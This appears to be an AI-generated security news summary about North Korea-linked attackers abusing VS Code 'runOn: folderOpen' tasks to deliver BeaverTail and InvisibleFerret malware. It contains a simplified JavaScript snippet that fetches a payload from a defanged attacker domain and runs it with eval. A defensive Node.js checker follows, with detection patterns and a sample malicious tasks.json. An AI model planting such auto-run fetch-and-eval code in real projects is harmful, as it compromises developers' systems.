North Korea-Linked Hackers Target Developers via Malicious VS Code Projects
These articles are AI-generated summaries. Please check the original sources for full details.
North Korean state-sponsored threat actors, associated with the “Contagious Interview” campaign, are leveraging malicious Visual Studio Code (VS Code) projects to deliver backdoors, spyware, and cryptocurrency miners to developer systems. The campaign, first observed in December 2025, utilizes VS Code task files to execute payloads staged on Vercel domains.
Why This Matters
The increasing sophistication of supply chain attacks targeting developers represents a significant escalation in cyber threats. Traditionally, developers were considered indirect targets; now, they are directly compromised to gain access to valuable source code, intellectual property, and financial systems, potentially resulting in millions of dollars in stolen cryptocurrency and intellectual property. The cost of remediation following a successful compromise can easily exceed six figures per incident.
Key Insights
- Contagious Interview Campaign: Active since 2025, evolving to use VS Code tasks for initial compromise.
- VS Code Task Abuse: Attackers exploit the “runOn: folderOpen” setting to execute malicious JavaScript payloads automatically when a project is opened.
- BeaverTail & InvisibleFerret: Two malware families deployed in the attacks, offering remote code execution, keylogging, and data exfiltration capabilities, with the latter utilizing a Python environment.
Working Example
// Example of obfuscated JavaScript payload (simplified)
// This is a conceptual example and does not represent the full complexity of the actual payload
function executePayload() {
    // Stage-two payload is fetched from an attacker-controlled Vercel domain (URL defanged)
    fetch('https://ip-regions-check.vercel[.]app/payload.js')
        .then(response => response.text())
        .then(data => {
            eval(data); // Execute the received JavaScript code
        })
        .catch(error => {
            console.error('Error fetching payload:', error);
        });
}
executePayload();
Practical Applications
- Security Teams: Implement robust code review processes and endpoint detection and response (EDR) systems to identify and block malicious code execution.
- Pitfall: Relying solely on static analysis of code; attackers are employing dynamic payload delivery and obfuscation techniques to evade detection.
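As an added example (not code from the article or from any vendor it cites), a small Node.js check that parses a project's .vscode/tasks.json and reports every task configured with runOn: folderOpen, the auto-execution hook the article describes, together with command-line indicators a reviewer would want flagged. The sample tasks.json and its URL are constructed; the check assumes plain JSON input (real tasks.json files may contain comments, which need a JSONC parser).

```javascript
// Added example: flag VS Code tasks that run automatically on folder open.
// Assumption: input is plain JSON (strip comments / use a JSONC parser for real files).
const SUSPICIOUS_PATTERNS = [
  /\beval\s*\(/i,                        // dynamic code execution
  /\bnode\s+-e\b/i,                      // inline Node script on the command line
  /\bcurl\b|\bwget\b|\bfetch\s*\(/i,     // remote download of a second stage
  /powershell|\biex\b|invoke-expression/i,
  /https?:\/\//i,                        // any remote URL inside a task command
];

// Gather every string that could end up on the task's command line,
// including per-OS overrides that VS Code allows in tasks.json.
function taskCommandText(task) {
  const parts = [task.command, ...(task.args || [])];
  for (const os of ['windows', 'linux', 'osx']) {
    if (task[os]) parts.push(task[os].command, ...(task[os].args || []));
  }
  return parts.filter(p => typeof p === 'string').join(' ');
}

// Return one finding per task that fires without user interaction.
function findAutoRunTasks(tasksJsonText) {
  const doc = JSON.parse(tasksJsonText);
  const findings = [];
  for (const task of doc.tasks || []) {
    const runOn = task.runOptions && task.runOptions.runOn;
    if (runOn !== 'folderOpen') continue;
    const text = taskCommandText(task);
    const indicators = SUSPICIOUS_PATTERNS.filter(re => re.test(text)).map(re => re.source);
    findings.push({ label: task.label, command: text, indicators });
  }
  return findings;
}

// Constructed sample tasks.json resembling the technique (placeholder URL, not a real indicator).
const SAMPLE_TASKS_JSON = JSON.stringify({
  version: '2.0.0',
  tasks: [
    { label: 'build', type: 'shell', command: 'npm run build' },
    { label: 'setup', type: 'shell', command: 'node',
      args: ['-e', "fetch('https://example.invalid/payload.js').then(r=>r.text()).then(d=>eval(d))"],
      runOptions: { runOn: 'folderOpen' } },
  ],
});

for (const f of findAutoRunTasks(SAMPLE_TASKS_JSON)) {
  console.log(`[auto-run task] ${f.label}: ${f.command}`);
  console.log(`  indicators: ${f.indicators.join(' | ') || 'none'}`);
}
```

Run it over each cloned repository's .vscode/tasks.json before opening the folder in VS Code; a task that auto-runs with no indicators still deserves a manual look.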